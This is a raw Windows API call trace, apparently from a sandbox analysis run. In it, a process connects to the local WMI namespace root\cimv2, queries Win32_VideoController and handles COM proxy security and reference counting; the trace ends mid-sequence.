	[0221.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc380f0, riid=0x1c68c890*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c870 | out: ppvObject=0x1c68c870*=0x1cc380f0) returned 0x0
	[0221.704] WbemDefPath:IUnknown:Release (This=0x1cc380f0) returned 0x2
	[0221.704] WbemDefPath:IUnknown:Release (This=0x1cc380f0) returned 0x1
	[0221.704] CoGetContextToken (in: pToken=0x1c68c990 | out: pToken=0x1c68c990) returned 0x0
	[0221.704] CoGetContextToken (in: pToken=0x1c68c8d0 | out: pToken=0x1c68c8d0) returned 0x0
	[0221.704] WbemDefPath:IUnknown:AddRef (This=0x1cc380f0) returned 0x2
	[0221.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc380f0, riid=0x1c68ca10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9f0 | out: ppvObject=0x1c68c9f0*=0x1cc380f0) returned 0x0
	[0221.704] WbemDefPath:IUnknown:Release (This=0x1cc380f0) returned 0x2
	[0221.704] WbemDefPath:IUnknown:AddRef (This=0x1cc380f0) returned 0x3
	[0221.704] WbemDefPath:IWbemPath:SetText (This=0x1cc380f0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.704] WbemDefPath:IUnknown:Release (This=0x1cc380f0) returned 0x2
	[0221.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68cca0 | out: puCount=0x1c68cca0*=0x2) returned 0x0
	[0221.704] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cca0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cca0*=0x17, pszText=0x0) returned 0x0
	[0221.705] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cca0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cca0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.705] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68cc50 | out: puCount=0x1c68cc50*=0x2) returned 0x0
	[0221.705] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cc50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc50*=0x17, pszText=0x0) returned 0x0
	[0221.705] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cc50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.705] CoGetObjectContext (in: riid=0x1c68cb88*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb80 | out: ppv=0x1c68cb80*=0x221868) returned 0x0
	[0221.705] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cba0 | out: pAptType=0x1c68cba0*=1) returned 0x0
	[0221.705] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cca8 | out: ppvObject=0x1c68cca8*=0x0) returned 0x80004002
	[0221.705] IUnknown:Release (This=0x221868) returned 0x1
	[0221.705] CoGetClassObject (in: rclsid=0x1b8749f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c830 | out: ppv=0x1c68c830*=0x1cc3e2e0) returned 0x0
	[0221.705] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e2e0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c540 | out: ppvObject=0x1c68c540*=0x0) returned 0x80004002
	[0221.705] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cc3e2e0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c528 | out: ppvObject=0x1c68c528*=0x1cc3e300) returned 0x0
	[0221.706] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e300, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c430 | out: ppvObject=0x1c68c430*=0x1cc3e300) returned 0x0
	[0221.706] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e300, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c4b0 | out: ppvObject=0x1c68c4b0*=0x0) returned 0x80004002
	[0221.706] WbemLocator:IUnknown:AddRef (This=0x1cc3e300) returned 0x3
	[0221.706] CoGetContextToken (in: pToken=0x1c68c100 | out: pToken=0x1c68c100) returned 0x0
	[0221.706] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e300, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c0c0 | out: ppvObject=0x1c68c0c0*=0x0) returned 0x80004002
	[0221.706] CoGetContextToken (in: pToken=0x1c68c0d0 | out: pToken=0x1c68c0d0) returned 0x0
	[0221.706] WbemLocator:IUnknown:AddRef (This=0x1cc3e300) returned 0x4
	[0221.706] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e300, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1e8 | out: ppvObject=0x1c68c1e8*=0x0) returned 0x80004002
	[0221.707] WbemLocator:IUnknown:Release (This=0x1cc3e300) returned 0x3
	[0221.707] WbemLocator:IUnknown:Release (This=0x1cc3e300) returned 0x2
	[0221.707] WbemLocator:IUnknown:Release (This=0x1cc3e2e0) returned 0x0
	[0221.707] WbemLocator:IUnknown:Release (This=0x1cc3e300) returned 0x1
	[0221.707] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0221.707] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0221.707] WbemLocator:IUnknown:AddRef (This=0x1cc3e300) returned 0x2
	[0221.707] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3e300, riid=0x1c68c770*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c750 | out: ppvObject=0x1c68c750*=0x1cc3e300) returned 0x0
	[0221.707] WbemLocator:IUnknown:Release (This=0x1cc3e300) returned 0x2
	[0221.707] WbemLocator:IUnknown:Release (This=0x1cc3e300) returned 0x1
	[0221.708] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68cb50 | out: puCount=0x1c68cb50*=0x2) returned 0x0
	[0221.708] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=8, puBuffLength=0x1c68cb50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cb50*=0x17, pszText=0x0) returned 0x0
	[0221.708] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=8, puBuffLength=0x1c68cb50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cb50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.708] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c68c840 | out: ppv=0x1c68c840*=0x1cc3e320) returned 0x0
	[0221.708] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cc3e320, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c68cad0 | out: ppNamespace=0x1c68cad0*=0x1cc3b6a8) returned 0x0
	[0222.360] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3b6a8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c6b8 | out: ppvObject=0x1c68c6b8*=0x1b86eb20) returned 0x0
	[0222.360] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b86eb20, pProxy=0x1cc3b6a8, pAuthnSvc=0x1c68c6b0, pAuthzSvc=0x1c68c6ac, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8, pImpLevel=0x1c68c6c4, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0 | out: pAuthnSvc=0x1c68c6b0*=0xa, pAuthzSvc=0x1c68c6ac*=0x0, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8*=0x6, pImpLevel=0x1c68c6c4*=0x2, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0*=0x1) returned 0x0
	[0222.360] WbemLocator:IUnknown:Release (This=0x1b86eb20) returned 0x1
	[0222.360] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3b6a8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c658 | out: ppvObject=0x1c68c658*=0x1b86eb60) returned 0x0
	[0222.360] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3b6a8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c5e8 | out: ppvObject=0x1c68c5e8*=0x1b86eb20) returned 0x0
	[0222.360] WbemLocator:IClientSecurity:SetBlanket (This=0x1b86eb20, pProxy=0x1cc3b6a8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0222.361] WbemLocator:IUnknown:Release (This=0x1b86eb20) returned 0x2
	[0222.361] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x1
	[0222.361] CoTaskMemFree (pv=0x1b885e00) 
	[0222.361] WbemLocator:IUnknown:Release (This=0x1cc3e320) returned 0x0
	[0222.361] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3b6a8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c2d0 | out: ppvObject=0x1c68c2d0*=0x1b86eb60) returned 0x0
	[0222.361] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c350 | out: ppvObject=0x1c68c350*=0x0) returned 0x80004002
	[0222.362] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c0e8 | out: ppvObject=0x1c68c0e8*=0x0) returned 0x80004002
	[0222.363] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x3
	[0222.363] CoGetContextToken (in: pToken=0x1c68bfa0 | out: pToken=0x1c68bfa0) returned 0x0
	[0222.363] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf60 | out: ppvObject=0x1c68bf60*=0x1b86ea48) returned 0x0
	[0222.363] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86ea48, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bf90 | out: pCid=0x1c68bf90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.363] WbemLocator:IUnknown:Release (This=0x1b86ea48) returned 0x3
	[0222.364] CoGetContextToken (in: pToken=0x1c68bf70 | out: pToken=0x1c68bf70) returned 0x0
	[0222.364] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x4
	[0222.364] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c088 | out: ppvObject=0x1c68c088*=0x1b86eb30) returned 0x0
	[0222.364] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x4
	[0222.364] WbemLocator:IRpcOptions:Query (in: This=0x1b86eb30, pPrx=0x1b86eb60, dwProperty=2, pdwValue=0x1c68c0f8 | out: pdwValue=0x1c68c0f8) returned 0x80004002
	[0222.364] WbemLocator:IUnknown:Release (This=0x1b86eb30) returned 0x3
	[0222.364] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x2
	[0222.364] CoGetContextToken (in: pToken=0x1c68c470 | out: pToken=0x1c68c470) returned 0x0
	[0222.364] CoGetContextToken (in: pToken=0x1c68c3b0 | out: pToken=0x1c68c3b0) returned 0x0
	[0222.364] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x3
	[0222.364] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x1c68c4f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c4d0 | out: ppvObject=0x1c68c4d0*=0x1cc3b6a8) returned 0x0
	[0222.365] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x3
	[0222.365] WbemLocator:IUnknown:Release (This=0x1cc3b6a8) returned 0x2
	[0222.365] WbemLocator:IUnknown:Release (This=0x1cc3b6a8) returned 0x1
	[0222.365] CoGetContextToken (in: pToken=0x1c68ca70 | out: pToken=0x1c68ca70) returned 0x0
	[0222.365] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x2
	[0222.365] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c640 | out: ppvObject=0x1c68c640*=0x1b86eb60) returned 0x0
	[0222.365] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x2
	[0222.366] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x1
	[0222.366] CoGetContextToken (in: pToken=0x1c68c710 | out: pToken=0x1c68c710) returned 0x0
	[0222.366] CoGetContextToken (in: pToken=0x1c68c650 | out: pToken=0x1c68c650) returned 0x0
	[0222.366] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x2
	[0222.366] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x1c68c790*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c770 | out: ppvObject=0x1c68c770*=0x1cc3b6a8) returned 0x0
	[0222.366] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x2
	[0222.366] WbemLocator:IUnknown:AddRef (This=0x1cc3b6a8) returned 0x3
	[0222.366] IWbemServices:ExecQuery (in: This=0x1cc3b6a8, strQueryLanguage="WQL", strQuery="select * from Win32_VideoController", lFlags=16, pCtx=0x0, ppEnum=0x1c68cc08 | out: ppEnum=0x1c68cc08*=0x1cc44cc8) returned 0x0
	[0222.371] IUnknown:QueryInterface (in: This=0x1cc44cc8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c818 | out: ppvObject=0x1c68c818*=0x1cc44cd0) returned 0x0
	[0222.371] IClientSecurity:QueryBlanket (in: This=0x1cc44cd0, pProxy=0x1cc44cc8, pAuthnSvc=0x1c68c810, pAuthzSvc=0x1c68c80c, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808, pImpLevel=0x1c68c824, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820 | out: pAuthnSvc=0x1c68c810*=0xa, pAuthzSvc=0x1c68c80c*=0x0, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808*=0x6, pImpLevel=0x1c68c824*=0x2, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820*=0x1) returned 0x0
	[0222.371] IUnknown:Release (This=0x1cc44cd0) returned 0x1
	[0222.371] IUnknown:QueryInterface (in: This=0x1cc44cc8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7b8 | out: ppvObject=0x1c68c7b8*=0x1b86e0e0) returned 0x0
	[0222.371] IUnknown:QueryInterface (in: This=0x1cc44cc8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c748 | out: ppvObject=0x1c68c748*=0x1cc44cd0) returned 0x0
	[0222.371] IClientSecurity:SetBlanket (This=0x1cc44cd0, pProxy=0x1cc44cc8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0222.373] IUnknown:Release (This=0x1cc44cd0) returned 0x2
	[0222.373] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x1
	[0222.373] CoTaskMemFree (pv=0x1b885cb0) 
	[0222.373] IUnknown:QueryInterface (in: This=0x1cc44cc8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c3f0 | out: ppvObject=0x1c68c3f0*=0x1b86e0e0) returned 0x0
	[0222.373] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c470 | out: ppvObject=0x1c68c470*=0x0) returned 0x80004002
	[0222.374] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c208 | out: ppvObject=0x1c68c208*=0x0) returned 0x80004002
	[0222.374] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x3
	[0222.374] CoGetContextToken (in: pToken=0x1c68c0c0 | out: pToken=0x1c68c0c0) returned 0x0
	[0222.374] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c080 | out: ppvObject=0x1c68c080*=0x1b86dfc8) returned 0x0
	[0222.374] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86dfc8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c0b0 | out: pCid=0x1c68c0b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.375] WbemLocator:IUnknown:Release (This=0x1b86dfc8) returned 0x3
	[0222.375] CoGetContextToken (in: pToken=0x1c68c090 | out: pToken=0x1c68c090) returned 0x0
	[0222.375] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x4
	[0222.375] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1a8 | out: ppvObject=0x1c68c1a8*=0x1b86e0b0) returned 0x0
	[0222.375] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x4
	[0222.375] WbemLocator:IRpcOptions:Query (in: This=0x1b86e0b0, pPrx=0x1b86e0e0, dwProperty=2, pdwValue=0x1c68c218 | out: pdwValue=0x1c68c218) returned 0x80004002
	[0222.375] WbemLocator:IUnknown:Release (This=0x1b86e0b0) returned 0x3
	[0222.375] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x2
	[0222.375] CoGetContextToken (in: pToken=0x1c68c590 | out: pToken=0x1c68c590) returned 0x0
	[0222.375] CoGetContextToken (in: pToken=0x1c68c4d0 | out: pToken=0x1c68c4d0) returned 0x0
	[0222.375] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x3
	[0222.375] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x1c68c610*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c5f0 | out: ppvObject=0x1c68c5f0*=0x1cc44cc8) returned 0x0
	[0222.376] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x3
	[0222.376] IUnknown:Release (This=0x1cc44cc8) returned 0x2
	[0222.376] IUnknown:Release (This=0x1cc44cc8) returned 0x1
	[0222.376] WbemLocator:IUnknown:Release (This=0x1cc3b6a8) returned 0x2
	[0222.376] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68cbb0 | out: puCount=0x1c68cbb0*=0x2) returned 0x0
	[0222.376] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cbb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbb0*=0x17, pszText=0x0) returned 0x0
	[0222.376] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cbb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.376] CoGetContextToken (in: pToken=0x1c68c7b0 | out: pToken=0x1c68c7b0) returned 0x0
	[0222.376] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0222.376] WbemLocator:IUnknown:AddRef (This=0x1b86e0e0) returned 0x2
	[0222.376] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e0e0, riid=0x1c68c830*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c810 | out: ppvObject=0x1c68c810*=0x1cc44cc8) returned 0x0
	[0222.376] WbemLocator:IUnknown:Release (This=0x1b86e0e0) returned 0x2
	[0222.377] IUnknown:AddRef (This=0x1cc44cc8) returned 0x3
	[0222.377] IEnumWbemClassObject:Clone (in: This=0x1cc44cc8, ppEnum=0x1c68cc70 | out: ppEnum=0x1c68cc70*=0x1cc44e18) returned 0x0
	[0222.378] IUnknown:QueryInterface (in: This=0x1cc44e18, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c8c8 | out: ppvObject=0x1c68c8c8*=0x1cc44e20) returned 0x0
	[0222.378] IClientSecurity:QueryBlanket (in: This=0x1cc44e20, pProxy=0x1cc44e18, pAuthnSvc=0x1c68c8c0, pAuthzSvc=0x1c68c8bc, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8, pImpLevel=0x1c68c8d4, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0 | out: pAuthnSvc=0x1c68c8c0*=0xa, pAuthzSvc=0x1c68c8bc*=0x0, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8*=0x6, pImpLevel=0x1c68c8d4*=0x2, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0*=0x1) returned 0x0
	[0222.378] IUnknown:Release (This=0x1cc44e20) returned 0x1
	[0222.378] IUnknown:QueryInterface (in: This=0x1cc44e18, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c868 | out: ppvObject=0x1c68c868*=0x1b86e6e0) returned 0x0
	[0222.378] IUnknown:QueryInterface (in: This=0x1cc44e18, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7f8 | out: ppvObject=0x1c68c7f8*=0x1cc44e20) returned 0x0
